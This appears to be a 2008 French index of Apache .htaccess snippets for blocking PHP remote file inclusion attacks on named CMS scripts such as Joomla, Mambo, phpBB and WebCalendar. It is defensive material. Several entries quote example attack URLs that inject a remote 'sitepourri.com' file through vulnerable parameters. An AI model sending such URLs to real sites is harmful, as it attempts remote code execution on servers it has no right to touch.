Codes sources Apache disponibles [26]

Bouts de codes

Liste des codes sources disponibles en Apache dans la catégorie : Anti hack

Classement par date

snippets



26.  Protection contre les attaques de hacker avec register global on ( 22 Juin 2008 )
Les hackers exploitent souvent la facilité qui consiste à définir les variables GET ou POST en variables globales. Par exemple la variable $_GET['var1'] est également accessible par $var1. Le cas le plus fréquent d'exploitation est l'utilisation d'une variable préfixant le chemin des includes comme : include($prefix_path ....
25.  Vulnérabilité touchant webcalendar via tools/send_reminders.php ( 17 Juin 2008 )
Votre site peut être victime de hacking par inclusion de fichiers distants. Pour cela il faut que register globals soit à on. Dans ce cas les paramètres GET de l'url sont déclarés comme des variables accessibles par leur nom. Le paramètre includedir permet ici de définir le préfixe des chemins dans l'instruction include. Cette règle dans le fichier...
24.  Corriger la faille touchant mambo via image_upload.php ( 15 Juin 2008 )
Le CMS mambo peut être victime d'attaque par inclusion de fichiers externes. La prise de contrôle de votre site en est le but ultime. Le script concerné est image_upload.php avec un paramèyre sbp. Cette petite règle dans le fichier .htaccess vous protégera car il renverra un code 403 (accès interdit) aux hackers.
23.  Sécurisation de votre site avec phpbb (phpbb_root_path) ( 09 Juin 2008 )
Les sites à base de CMS et de composant disponibles gratuitement sur internet sont sensibles aux attaques et aux vulnérabilités par inclusion de fichier distant (RFI). En effet leur code est connu de tous et analysé par les hackers pour détecter des failles. Celle-ci touche comme souvent les script contenant des chemin d'includes préfixés par une...
22.  Protection contre le hack avec 404.php ( 09 Juin 2008 )
Le script se trouve peut-être sur votre site géré par open-medium.CMS en version 0.25. La faille touche les sites dont le paramètre register_globals est à on. Une petite règle dans le fichier .htaccess permet de renvoyer un code retour 403. Les url concernées sont de la forme : ...
21.  Se protéger du hacking avec admin.php et include_path ( 09 Juin 2008 )
Vous pouvez être victime d'un hacker qui utilise l'inclusion de fichier distant pour exécuter le code qu'il veut sur votre serveur. Le paramètre include_path permet de préfixer le chemin des fichiers passé comme paramètre de la fonction include. Cette faille ne concerne que les site dont le paramètre register globals est à on. Pour vous protéger il...
20.  Bloquer les requêtes de hacker avec %3Cstring%3E ( 08 Juin 2008 )
Votre site est peut être une victime possible de cette faille de sécurité. Les url sont de la forme http://www.example.com/%3Cstring%3Ehttp://sitepourri.com/fichier.txt?? Pour vous protéger il suffit d'une petite règle dans le fichier .htaccess qui retourne une erreur 403 à chaque tentatives.
19.  Protection contre la faille de sécurité de info.inc.php ( 04 Juin 2008 )
Cette vulnérabilité touche le script info.inc.php qui contient des chemins d'includes préfixés par la variable $cfg[ThemePath]. Si register global est on, il est ainsi possible de faire remplacer les includes par des scripts externes. Ces lignes dans un fichier .htaccess permettent de se protéger d'une inclusion de fichier distant en retournant...
18.  Vulnérabilité par inclusion de fichier distant avec smarty.php ( 02 Juin 2008 )
Vous pouvez être victime d'une attaque grâce au script smarty.php s'il est appelé avec un paramètre full_path_to_public_program. Si register globals est ON, ce paramètre indique un chemin qui sert de préfixe dans une instruction require. Il faut donc ajouter ces deux lignes dans le fichier .htaccess pour renvoyer un code retour 403 interdisant...
17.  Protection contre la faille de sécurité de stats.inc.php ( 02 Juin 2008 )
Il est possible d'exploiter cette faille de sécurité sur le script stats.inc.php en utilisant le paramètre prefix. Ce paramètre comme son nom l'indique préfixe les chemins de fichier dans les include. Si vous retourner un code retour 403 (accès interdit), vous être tranquille. Voir également : » Page d'erreur 403 personnalisée
16.  Eviter la faille de sécurité de joomla (mosDirectory) ( 31 Mai 2008 )
Cette faille de sécurité par RFI (remote file include) existe dans le composant mosDirectory de joomla. La vulnérabilité concerne le script mod_pxt_latest.php. Les url concernées sont de la forme : http://www.example.com/com_directory/modules/mod_pxt_latest.php? GLOBALS[mosConfig_absolute_path]=http://www.sitepourri.com/page.txt?? Voir...
15.  Inclusion de fichiers distants avec un script de HITWEB ( 31 Mai 2008 )
Il est possible dans certains cas de faire exécuter du code malveillant avec le script addlink.php3 et un paramètre REP_CLASS. En effet si le paramètre register_globals est à on, la variable $REP_CLASS est initialisée avec le paramètre GET. Comme cette variable sert de préfixe au chemin des includes du script addlink.php3 il est facile d'exécuter...
14.  Bloquer le hacking avec le script errors.php ( 30 Mai 2008 )
Les failles de sécurité sont nombreuses dans les scripts php. Celle ci permet à un hacker d'éxécuter sur votre serveur un include externe par l'intermédiaire du paramètre error du script errors.php. Pour vous prémunir d'une prise de contrôle de votre site par un pirate du net il vous faut ajouter ces deux lignes dans votre fichier .htaccess qui...
13.  Empêcher les attaques par include de fichier externe ( 25 Mai 2008 )
Les tentatives de hacker sont nombreuses et se font souvent sur le même modèle. Un paramètre permet d’include un script externe. Il est ainsi possible d’exécuter n’importe quel code sur votre serveur. Le hacker peut donc faire tout ce qu’il veut sur votre site. Les url se terminent souvent par un ? car ce caractère transforme tout ce qui se trouve...
12.  Eviter les attaques par le script send_reminders.php ( 25 Mai 2008 )
Votre site est peut-être vulnérable si vous avez WebCalendar. En effet vous risquez d'être victime d'une attaque par inclusion de code externe (remote file include vulnerability). Les url à l'origine de ces hacks sont de la forme : http://www.example.om/tools/send_reminders.php?includedir=http://www.sitepourri.com/fichier.txt? Une petite règle...
11.  Bloquer les hackers utilisant le script booth.php ( 25 Mai 2008 )
Les attaques par inclusion de fichier php distant sont nombreuses et les pirates d'internet en profitent. Le script booth.php présent dans Advanced Poll (PHP) permet d'inclure du code ne se trouvant pas sur votre serveur si register_globals vaut OFF. Le paramètre include_path est utilisé pour définir un chemin d'include distant. Les url essayant de...
10.  Bloquer l'accès au site pour le navigateur libwww-perl ( 24 Mai 2008 )
La librairie perl libwww est une interface de programmation d'application (API). Elle fournit un ensemble de fonctions pour l'accès à des données internet. Vous pouvez ainsi faire un moteur de recherche à partir de cette librairie. Malheureusement elle est souvent utilisée par les hackers pour faire un scanner de vulnérabilité par RFI (remote file...
9.  Empêcher le hack via sitemap.php ( 23 Mai 2008 )
De moins en moins de connaissances sont nécessaires pour faire un site internet grâce aux différents CMS et templates gratuits. Le problème est que quasiment personne ne vérifie ce qu'il installe sur son site. Vous pouvez ainsi vous retrouver avec un script qui permet d'exécuter du code malveillant. Si vous disposez d'un script...
8.  Empêcher le hack via bbs.lib.inc.php ( 23 Mai 2008 )
En suivant les erreurs 404 on se rend compte du nombre important de tentatives de prise de contrôle d'un site par les hackers. Certains scripts disposent d'un paramètre permettant d'exécuter du code qui ne se trouve pas sur votre site. Le code ci-dessous vous permet d'éviter cela avec le script bbs.lib.inc.php. Ainsi, vous pouvez ajouter ces deux...
7.  Empêcher le hack via aedatingCMS.php ( 23 Mai 2008 )
Les hackers sont très actifs et ils disposent d'un nombre important de portes d'entrée pour prendre le contrôle d'un site. Cette règle .htaccess permet d'éviter les attaques avec un script aedatingCMS.php. Le flag F renvoie un code retour 403 (accès interdit) si le paramètre dir[inc] contient une url externe. Voir également : » Page d'erreur...
6.  Empêche le hack via wamp_dir/setup/yesno.phtml ( 23 Mai 2008 )
Les failles de sécurité sont nombreuses avec la multiplication des CMS, blogs, forums et des addons. Ce nouvel exemple exploite le paramètre no_url. Pour éviter les mauvaises surprises si vous utilisez ce script il est indispensable d'ajouter deux petites lignes dans le fichier .htaccess pour bloquer des tentatives de piratage avec des url du type...
5.  Empêcher le hack via setup/header.php ( 21 Mai 2008 )
Si vous utilisez un script setup/header.php ayant un paramètre css_path, vous pouvez être victimes d'une faille de sécurité. Grâce à ce script il est peut-être possible d'exécuter un script externe avec une url du style http://www.example.com/setup/header.php?css_path=http://www.sitepourri.com/url.txt? Il faut donc tester que le paramètre ne...
4.  Empêcher le hack via admin.php ( 18 Mai 2008 )
Il est possible de prendre le contrôle d'un site disposant d'un script admin.php avec un paramètre Htmls. En effet ce paramètre permet de faire exécuter un script externe. Pour interdire l'exécution par un hacker de ce script externe il est indispensable d'ajouter une règle dans le fichier .htaccess qui retourne un code retour 403. Les url essayant...
3.  Empêcher le hack via admin_smilies.php ( 15 Mai 2008 )
Cette faille de sécurité est exploitée par des robots en utilisant le script admin_smilies.php avec le paramètre phpbb_root_path. Pour bloquer ces tentatives de piratage du site il faut ajouter une petite règle dans le fichier .htaccess. Ainsi un code retour 403 (accès interdit) est retourné si le paramètre phpbb_root_path contient une url externe....
2.  Empêcher le hack via gestion_sondage.php ( 13 Mai 2008 )
Les robots des hackers qui crawlent le web essayent de trouver des failles de sécurité à vos scripts pour injecter en générale des urls. L'un de ces robots utilise un script de sondage avec un paramètre repertoire_visiteur. Les urls sont sous la forme:...
1.  Empêcher le hack via mosConfig_absolute_path ( 12 Mai 2008 )
Les sites internet sont souvent attaqués par des robots qui cherchent des failles de sécurité. Voici un exemple de protection qui permet de bloquer les tentatives d'attaques du type http://www.example.com/?mosConfig_absolute_path=http://www.sitepourri.com/url.txt? On test donc que les paramètres d'url contiennent la variable...

Derniers codes sources - snippets